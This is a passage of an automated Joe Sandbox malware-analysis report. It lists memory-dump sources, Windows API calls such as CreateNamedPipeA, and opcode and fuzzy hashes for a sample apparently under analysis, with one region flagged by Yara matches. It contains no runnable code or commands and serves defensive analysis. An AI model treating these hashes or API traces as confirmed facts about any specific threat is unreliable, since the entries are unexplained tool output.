                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                          • Opcode ID: d7f8f86f07f8f9007f6d302e2c2d42afaf8508986f45a14eca90573ef8ce6571
                                                                                                                                                                                                                                                          • Instruction ID: c9c79bae32f71595b1e6aa6d164554c8be685a8e9a880a520bac664178b6ec6d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7f8f86f07f8f9007f6d302e2c2d42afaf8508986f45a14eca90573ef8ce6571
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24E0B631404648EBCF11BF64DD0DEAC3F6AFB58381F048914F9858A162CB75ED56DB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0050A1AD
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: 0ef9f08ee2e8aa53cab2dd43d6ecdecb4cdccf0104839ac1778559372945e213
                                                                                                                                                                                                                                                          • Instruction ID: 2ddad0799a26c59e909d31d09550f28efac1dc0805a100d4a9117d167747519e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef9f08ee2e8aa53cab2dd43d6ecdecb4cdccf0104839ac1778559372945e213
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98518C76D0530A8BEF24CFAAD88569EBFF4FB49318F14856AD805E7290D3309A48CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                          • API String ID: 0-2043925204
                                                                                                                                                                                                                                                          • Opcode ID: 32182ada8d8d12014be4b45b1a25749a6ab8a604b252b1c2c6ca3452bb2bc592
                                                                                                                                                                                                                                                          • Instruction ID: 7bddfc44ed5ca8a70101288a7efbc41cb6b61ded8aa1a2835d37e6720084e304
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32182ada8d8d12014be4b45b1a25749a6ab8a604b252b1c2c6ca3452bb2bc592
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD4102769002196ACB209FB9CC8DEBF7FB9FB85714F104669F905971C0E671AE818B50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateNamedPipeA.KERNEL32(000000010000092C,?,?,?,?,00000C8D,0000000100000A06,00000000), ref: 00503D6B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateNamedPipe
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 2489174969-853226302
                                                                                                                                                                                                                                                          • Opcode ID: 8ac8cee895f355ad9df9c351db77a7100d01bda1c699e07f419f3ec759d7b4e2
                                                                                                                                                                                                                                                          • Instruction ID: a97a677a5f07446ce3fdc5e7d4403b3a08467ecb943b499be1e9a3695ec89e27
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ac8cee895f355ad9df9c351db77a7100d01bda1c699e07f419f3ec759d7b4e2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6316A7A200202DFD314CF28D984F96BBF9FB9A315F054AA9E449D73A1C730E918CB52
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,00000000,?,00188489,?), ref: 00504851
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 626452242-853226302
                                                                                                                                                                                                                                                          • Opcode ID: bdd3cad3a54af1673cb60cf15329f16dc5af5ca72481b7fbf115593a1e1108eb
                                                                                                                                                                                                                                                          • Instruction ID: ec08800e19cd9e9fc931293fd7ac454a00030a04e799e00ad6fac2ab5344c452
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdd3cad3a54af1673cb60cf15329f16dc5af5ca72481b7fbf115593a1e1108eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9541397A2142009FE304CF68C985E97B7F9FB99304F058A69E589DB2A1C770E944CB52
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00506E33,?,?,00000008,?,?,0050641B,00000000), ref: 00507065
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                          • Opcode ID: 7d7f865fd54188e33749b9cc1f3781b7d92a7446d4b2eb62031815a205b788c0
                                                                                                                                                                                                                                                          • Instruction ID: d5bdfd94e61a7ee9a2b90921875f6fc2ca014c0fe98b4f47a13be62c6ef8f514
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d7f865fd54188e33749b9cc1f3781b7d92a7446d4b2eb62031815a205b788c0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7B13A356106099FD715CF28C49AB697FE0FF49364F298698E899CF2E1C335E992CB40
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0000A4D6,0050A004), ref: 0050A4CF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          • Opcode ID: def88f996c58ab40c1fb200ea3a55167d3f843e5e68cc5647b972f3bb9c92787
                                                                                                                                                                                                                                                          • Instruction ID: fc5c31ceb88444055fed42c7bf977ad1aa0ef50a92587be19b8851f78000abcb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: def88f996c58ab40c1fb200ea3a55167d3f843e5e68cc5647b972f3bb9c92787
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 0-853226302
                                                                                                                                                                                                                                                          • Opcode ID: 33d485ead0e4c44753a73a6dc3207ec6c4bfc1f402899b3196c575d49f2c6ba2
                                                                                                                                                                                                                                                          • Instruction ID: 87563abdd82e7616354b3f9b9c8919cc7e101995301ccf04a0eac3705ec76c7e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33d485ead0e4c44753a73a6dc3207ec6c4bfc1f402899b3196c575d49f2c6ba2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27511939600701CFC364CF38D580A9AB7E5FB9A314F148A69E89ACBB51DB70B855DB42
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: xnT
                                                                                                                                                                                                                                                          • API String ID: 0-853226302
                                                                                                                                                                                                                                                          • Opcode ID: d5b1a1f05316c0f61029afc0970ef2d4fb124051f8acf722d9e5d67b4587da35
                                                                                                                                                                                                                                                          • Instruction ID: 0dbc0f10e4f02511d60b594590c5aa704232c4c9ac162d1d9f8b26a06bb4e91c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5b1a1f05316c0f61029afc0970ef2d4fb124051f8acf722d9e5d67b4587da35
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E417DB1604346DFD724DF28C880ADAFBE9FB89304F44467AE649D7691D334E9488F92
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                          • Opcode ID: 56a3dbd5a7ba94fc09f72730f03c512072bc0c8f5d226a136a4d7ba9acf6cc63
                                                                                                                                                                                                                                                          • Instruction ID: 260ba7eb1f55a3e9cf9c4f0d9db2eb2144b719a46fcadb57e3ed795e50937bf4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a3dbd5a7ba94fc09f72730f03c512072bc0c8f5d226a136a4d7ba9acf6cc63
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27A02470103101CF5300CF305F0C34C35D5775D1C0700C1545010C1030F7304014F701
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742772659.0000000000FE6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE6000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe6000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                                                                                                                                                                                                                                          • Instruction ID: 9f266c4f7b002419c611761686c90de06dad3709199c31c766ecfcb58f566bde
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D029332E002658FDF00DF7AC9C06ADBBF1FB88390F114569E85AD7290EA74D942DB94
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6ed09dd08ab1a6c4ed83392796f0e6e5d5332839b4fd737ef94c44d1ceb07192
                                                                                                                                                                                                                                                          • Instruction ID: 33d41e83af2d1a87fd23c715ca91e50e585ac348c6f57b75ef934edc8dd56d06
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed09dd08ab1a6c4ed83392796f0e6e5d5332839b4fd737ef94c44d1ceb07192
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02E146786083548FC748CF19D8809AABBE1FB9E308F40496EF985C7361D734E859EB56
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 117f4e97a23f98fc6fc708544a31f31be4e652da85a710e198314e9b0b60ecf8
                                                                                                                                                                                                                                                          • Instruction ID: a55afbe6c8d6c0bf0ff396ad930363d27e1bcb740c49b56b993b705e94178cdf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 117f4e97a23f98fc6fc708544a31f31be4e652da85a710e198314e9b0b60ecf8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABB12125D2AF405DD7239A38883133ABB5CAFBB2D5F92D71BFC1670D62EB2185875140
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 78948c94898bb1e8c34b996578ddaec123151c0fb569e25c22a382000585a183
                                                                                                                                                                                                                                                          • Instruction ID: ca87c02599a0fa0359eeae7478179ad72be09f57734fc337f9f5244a48fb23b3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78948c94898bb1e8c34b996578ddaec123151c0fb569e25c22a382000585a183
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D15A786083198FC714CF2DD8804AABBF1FB9D308F908969F98587360D734E969DB95
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2742068720.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742014404.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742122813.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742178479.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742293820.0000000000546000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2742354571.0000000000549000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_500000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fee85f33b5c1de850709db8966b3584d5ab899922bf8fa2b80aff9acce81f5a2
                                                                                                                                                                                                                                                          • Instruction ID: e6712a5d02cf578f05766f29abcf195d1d3da0314e5800e83e1ea63c0ba952bb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fee85f33b5c1de850709db8966b3584d5ab899922bf8fa2b80aff9acce81f5a2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CB18E78608215CFC718CF18E9908A5BBF1FFAE308B85859EE8458B365D734B819DF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_13f0000_EwK95WVtzI.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2bdcd82ac2712c2b344fa170325648992ac663b641c31df508c606fa59581e25
                                                                                                                                                                                                                                                          • Instruction ID: 333eea5dee2e343bb00c341eb8fe06bf37e762eeefd5c7ced5dcbfcb5df87b3b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bdcd82ac2712c2b344fa170325648992ac663b641c31df508c606fa59581e25
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF0B42106C7C69ADBA6DF38C4A40C3FFE1AF4F31038A65CCC8C00D413C2109495D781
                                                                                                                                                                                                                                                          Uniqueness

